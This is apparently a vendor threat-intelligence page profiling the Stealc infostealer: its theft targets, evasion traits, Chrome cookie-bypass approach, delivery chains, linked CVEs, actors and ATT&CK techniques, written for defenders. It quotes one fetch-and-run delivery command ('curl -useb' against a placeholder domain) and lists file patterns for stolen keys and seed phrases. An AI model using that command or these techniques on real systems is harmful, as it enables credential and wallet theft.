Stealc is a Windows information-stealing malware family implemented in C, advertised on underground forums in January 2023 and identified in the wild in February 2023. It harvests browser passwords, cookies, authenticated-session tokens, autofill and payment data, browsing history, cryptocurrency-wallet data, and information from messaging, gaming, and email applications. Stealc V2 additionally targets password managers, cloud credentials, VPN and file-transfer applications, and sensitive files containing private keys, seed phrases, recovery information, and passwords. It can capture desktop screenshots and collect extensive host information, including installed software, running processes, hardware characteristics, language settings, and network configuration.
Stealc uses hardware-derived identifiers to track infected systems and communicates with command-and-control infrastructure to register victims, obtain collection settings, and exfiltrate stolen information. Its evasion features include dynamically resolved Windows APIs, obfuscated strings, Base64 and RC4 encryption, environment checks, locale exclusions, and configurable execution-expiration dates. Some variants support self-deletion. Its Chrome Application-Bound Encryption bypass retrieves plaintext cookies from browser process memory by launching Chrome on a hidden desktop and inspecting the network-service process. Other observed infection chains employ browser-focused process injection to facilitate credential and session-token theft.
Stealc is distributed as a secondary payload through loaders including Amadey, SmartLoader, and MintsLoader. Observed delivery methods include phishing, deceptive software-download websites, weaponized ClickOnce applications, fake GitHub repositories, and ClickFix prompts on compromised websites. The FakeGit campaign uses repositories impersonating legitimate developer tools to deliver SmartLoader and subsequently Stealc. Other campaigns have exploited CVE-2023-7028 in self-hosted GitLab instances to distribute it through Amadey. Meowsterio distributes Stealc alongside other infostealers, and Black Basta used it as part of its initial-access operations. Its theft of credentials and active sessions exposes personal accounts, enterprise services, cloud environments, and developer systems to subsequent account takeover and intrusion.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
2 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Exploitation de CVE-2023-7028 (GitLab) pour distribuer StealC via le loader Amadey. | « Exploitation de CVE-2023-7028 (GitLab) pour distribuer StealC via le loader Amadey. »
Developer tools: n8n workflows, CCNA labs, 7-Zip CVE-2025-0411 PoC, Cursor.so, Sora AI
21 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Meowsterio relies on infostealers such as StealC and Rhadamanthys to steal victim computer information and cryptocurrencies wallets data.
Deployed information-stealing malware like “Lumma” and “StealC.”
MintsLoader delivers StealC as a secondary payload; it targets browser credentials, extensions, cryptocurrency wallets, email, and financial tokens.
Stealc is an information stealer advertised on the underground forums XSS, Exploit and BHF by the Plymouth threat actor.
Recorded future unveiled in June 2024 that Atomic stealer is likely spread by the alias ‘markopolo’, an IAB spreading StealC, Rhadamanthys and Atomic
Deux bots infostealer originaires d’Algérie contenant ses identifiants (infectés par Raccoon en septembre 2022 et StealC en février 2024)
37 distinct techniques documented for this family, organized by ATT&CK tactic.
Scheduled Task/Job: Scheduled Task (T1053.005) (configuration-dependent).
Wagner.a3x... is a compiled AutoIt script... the final malicious payload is reconstructed from numerous encrypted hexadecimal data blocks.
Obfuscation uses arithmetic character encoding where every string is constructed via math expressions without [char] casts.
After the data is copied and processed, the temporary files created during the operation are deleted from the system.
STEALC calls ReadProcessMemory to access CanonicalCookieChrome structures from the Chrome network-service process. LUMMA uses NtReadVirtualMemory to locate chrome.dll and dump cookies in clear text.
Instead of trying to break MFA, attackers steal the session token generated after a user successfully authenticates.
Infostealers scan developer environments for files like credentials.json or .env files that store active OpenAI API keys in plaintext.
REDLINE ... identifies and steals cryptocurrency wallets... STEALC [collects] Cryptocurrency wallets.
Configuration... controls... browser credential theft... [and targets] Bitwarden, Dashlane, Keeper, KeePassXC, LastPass, NordPass, and RoboForm. | Targeted User Files: *private*.key, *seed*.txt, *mnemonic*.txt, *recovery*.txt, and *metamask*.json.
The malware uses RegOpenKeyExW and RegQueryValueExW APIs to read processor model information from the Windows Registry.
The malware obtains the name of the logged-in Windows user through the GetUserNameW API function.
The malware uses the CreateToolhelp32Snapshot API... [and] Process32Next API, collecting information such as process names and Process IDs.
The resulting report provides a comprehensive victim profile containing hardware specifications, operating system information, installed software, running processes, network configuration, and details about the system environment.
The malware scans Microsoft Outlook profiles... scans cryptocurrency wallet[s]... and constructs the target path containing Steam configuration files.
The malware compares the current system date with 05/08/2026. If the system date is later than this value, execution is terminated. | The malware uses the GetLocalTime API to retrieve the current system date from the operating system.
The malware maintains an internal blacklist containing the process names of commonly used analysis tools, reverse engineering applications, and virtualization software.
STEALC ... receive[s] an updated list of targeted browsers and targeted browser extensions... [and collects] Installed programs.
The malware... scans... cryptocurrency wallet[s]... [and targets] user files including passwords, recovery, mnemonic, and 2FA-related filenames.
The malware converts the desktop image captured using the BitBlt API... saves the screenshot... in JPEG format... [and] sends [it] to the C2 server.
The malware creates an HTTP request... with the POST method... Content-Type: application/json... [and] sends [it] to the C2 server.
All paths converge on: curl -useb http://[domain]/1.php?s=[campaign_ID].
680 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
200 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Information-stealing malware delivered by SmartLoader through the FakeGit campaign's malicious GitHub repositories. The content does not specify its collection capabilities or the information it steals.
An information-stealing malware delivered through the renewed FakeGit campaign using SmartLoader. The article does not detail its specific collection capabilities or data targets.
Cited as an example of an infostealer that can harvest browser vaults, session cookies, Discord tokens, and saved SSH/FTP credentials and send them to attacker-controlled infrastructure. The content does not establish that StealC was used in this breach.
Infostealer distribué au moyen du loader Amadey dans une chaîne exploitant une vulnérabilité GitLab.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.